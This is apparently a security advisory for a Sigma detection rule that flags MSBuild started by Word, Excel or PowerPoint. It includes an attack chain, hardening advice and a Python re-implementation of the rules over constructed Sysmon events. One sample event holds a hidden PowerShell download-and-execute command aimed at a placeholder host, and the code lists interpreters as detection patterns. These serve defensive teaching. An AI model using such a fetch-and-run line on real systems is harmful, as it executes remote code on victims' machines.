high advisory

Microsoft Build Engine Started by an Office Application

The Microsoft Build Engine (MSBuild) being started by an Office application is unusual behavior and could indicate a malicious document executing a script payload for defense evasion.

The Microsoft Build Engine (MSBuild) is the build platform that ships with the .NET Framework and Visual Studio, so a Microsoft-signed MSBuild.exe is present on most Windows hosts. A developer machine starts it from Visual Studio, a build agent or a console; an Office application such as Word or Excel has no legitimate reason to start it. When MSBuild is a child of an Office process, the likely explanation is a malicious document whose macro or exploit wrote a project file to disk and invoked MSBuild against it. Because MSBuild compiles and runs C# placed in an inline task of that project file, the payload executes inside a trusted, signed process without Office ever launching cmd.exe, PowerShell or an unsigned executable directly, which is exactly the pattern that application allow-listing and "Office spawned a script host" detections are built around. The rule was created in March 2020, and last updated in April 2026.

Attack Chain

  1. A user opens a malicious Office document (e.g., Word, Excel, PowerPoint).
  2. The document contains an embedded macro or an exploit that writes a project file (typically .xml, .csproj or .proj) to a user-writable location and triggers MSBuild.exe.
  3. MSBuild.exe is launched as a child process of the Office application (e.g., winword.exe, excel.exe, powerpnt.exe).
  4. MSBuild compiles and runs the project file named on its command line. An inline task in that file (C# source embedded in the project) is compiled and executed in the MSBuild process, so no separate executable needs to be dropped.
  5. The executed code performs the malicious activity, such as downloading additional payloads, modifying system settings, or establishing persistence.
  6. MSBuild may spawn further child processes, such as cmd.exe, powershell.exe or a script host, to run follow-on commands; this is what the second rule below looks for.
  7. The attacker achieves their objective, which could include data exfiltration, installing malware, or gaining unauthorized access to the system.

Impact

Successful exploitation can lead to the execution of arbitrary code on the victim’s machine, potentially resulting in data theft, malware installation, or complete system compromise. Since MSBuild is a legitimate Microsoft tool, its use by malicious actors can make detection more challenging. The impact is high because it leverages a trusted process to carry out malicious activities, evading standard security measures.

Recommendation

  • Deploy the Sigma rule "Microsoft Build Engine Started by an Office Application" to your SIEM to detect this specific behavior based on process creation events.
  • Make sure process creation events carry the fields the rule matches on (Image, ParentImage and CommandLine): enable Sysmon Event ID 1 with a configuration that does not exclude MSBuild.exe or the Office executables, or, if you rely on Windows Security auditing, enable Event ID 4688 together with the "Include command line in process creation events" policy, since 4688 omits the command line by default.
  • Investigate any alert generated by the rule, focusing on the command line of MSBuild.exe (the project file path it was given, especially under %TEMP%, %APPDATA% or Downloads) and on the parent process information, including the Office executable and the document it had open.
  • Treat MSBuild.exe with an Office parent as a high-priority indicator of compromise; a legitimate build tool started from Word or Excel is not a normal developer workflow and should not need an allow-list entry.
  • Review and harden Office macro settings to prevent execution of malicious macros: block macros in files from the Internet via Office policy, and where Microsoft Defender is in use, enable the Attack Surface Reduction rule "Block all Office applications from creating child processes", which stops this chain at step 3 regardless of which binary the macro tries to start.

Detection coverage (2 rules)

Microsoft Build Engine Started by an Office Application

high

Detects instances where MSBuild.exe is started by an Office application, potentially indicating malicious activity.

Format: Sigma
Tactics: defense_evasion, execution
Techniques: T1127
Log source: process_creation, windows

MSBuild Spawning Suspicious Processes

medium

Detects MSBuild spawning command interpreters or scripting hosts, indicative of code execution.

Format: Sigma
Tactics: defense_evasion, execution
Techniques: T1059.001, T1059.003, T1127
Log source: process_creation, windows
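The two rules above, and the attack chain they cover, are easiest to reason about with the logic written out and run over a few process creation records. The block below is an added example written for this page; it is not the platform's Sigma query and not code from the Sigma project. It re-implements both detections in Python over constructed Sysmon Event ID 1 records rendered as "Key: Value" text (field names follow Sysmon's schema; the GUIDs, paths and command lines are made up). The Office executables beyond winword, excel and powerpnt, and the script hosts beyond cmd and PowerShell, are assumptions about what the real rules cover, and the final step, raising the second rule to high when its MSBuild parent was itself flagged by the first rule, is an added correlation, not something the page says the platform does.

```python
import ntpath
import re

# Office parents named on this page plus other Office hosts the same logic
# should reasonably cover (the extra names are an assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                  "outlook.exe", "msaccess.exe", "mspub.exe", "visio.exe"}

# Command interpreters (T1059.003 cmd, T1059.001 PowerShell) and script hosts;
# wscript/cscript/mshta are an assumption about what "scripting hosts" means.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

RULE_OFFICE_MSBUILD = "Microsoft Build Engine Started by an Office Application"
RULE_MSBUILD_SPAWN = "MSBuild Spawning Suspicious Processes"


def parse_sysmon_text(text):
    """Parse blank-line separated blocks of 'Key: Value' lines into dicts.
    Lines starting with '#' are comments in the sample data, not Sysmon fields."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        event = {}
        for line in block.splitlines():
            if line.lstrip().startswith("#"):
                continue
            key, sep, value = line.partition(":")  # split on the first colon only
            if sep:
                event[key.strip()] = value.strip()
        if event:
            events.append(event)
    return events


def image_name(path):
    """Lower-cased file name of a Windows path: match on the binary, not its install dir."""
    return ntpath.basename(path).lower()


def is_msbuild_from_office(event):
    return (image_name(event.get("Image", "")) == "msbuild.exe"
            and image_name(event.get("ParentImage", "")) in OFFICE_PARENTS)


def is_msbuild_spawning_interpreter(event):
    return (image_name(event.get("ParentImage", "")) == "msbuild.exe"
            and image_name(event.get("Image", "")) in INTERPRETERS)


def run_detections(events):
    """Apply both rules; escalate rule 2 when its MSBuild parent was flagged by rule 1."""
    alerts = []
    office_msbuild = {}  # ProcessGuid -> event, for MSBuild instances with an Office parent
    for event in events:
        if is_msbuild_from_office(event):
            office_msbuild[event.get("ProcessGuid")] = event
            alerts.append({"rule": RULE_OFFICE_MSBUILD, "level": "high",
                           "event": event, "chained_to": None})
    for event in events:
        if is_msbuild_spawning_interpreter(event):
            parent = office_msbuild.get(event.get("ParentProcessGuid"))
            alerts.append({"rule": RULE_MSBUILD_SPAWN,
                           "level": "high" if parent else "medium",
                           "event": event, "chained_to": parent})
    return alerts


# Constructed sample: a macro document's MSBuild child spawning PowerShell,
# followed by a benign Visual Studio build whose pre-build step uses cmd.exe.
SAMPLE_EVENTS = r"""
ProcessGuid: {00000000-0000-0000-0000-000000000002}
Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
CommandLine: MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.xml
ParentProcessGuid: {00000000-0000-0000-0000-000000000001}
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

ProcessGuid: {00000000-0000-0000-0000-000000000003}
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ParentProcessGuid: {00000000-0000-0000-0000-000000000002}
ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

# Benign: Visual Studio building a project (no Office parent, rule 1 stays quiet)
ProcessGuid: {00000000-0000-0000-0000-000000000004}
Image: C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe
CommandLine: MSBuild.exe C:\src\app\app.csproj /t:Build
ParentProcessGuid: {00000000-0000-0000-0000-000000000009}
ParentImage: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe

# Same build running a pre-build step through cmd.exe: rule 2 fires at medium only
ProcessGuid: {00000000-0000-0000-0000-000000000005}
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /c "copy /Y C:\src\app\config.sample.json C:\src\app\config.json"
ParentProcessGuid: {00000000-0000-0000-0000-000000000004}
ParentImage: C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe
"""


def detect(text=SAMPLE_EVENTS):
    """Parse the sample and return the alert list (three alerts for SAMPLE_EVENTS)."""
    return run_detections(parse_sysmon_text(text))
```

On the sample the first rule fires once, for the MSBuild instance under WINWORD.EXE; the second rule fires twice, once at high for the PowerShell child whose ParentProcessGuid links back to that flagged MSBuild, and once at medium for the cmd.exe started by the Visual Studio build. That second hit is the kind of benign noise the medium rule produces on developer machines, which is why the Office parent (or the chain back to one) is the signal worth paging on; the project file path in the MSBuild command line (%TEMP% versus a source tree) is the next field an analyst checks.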
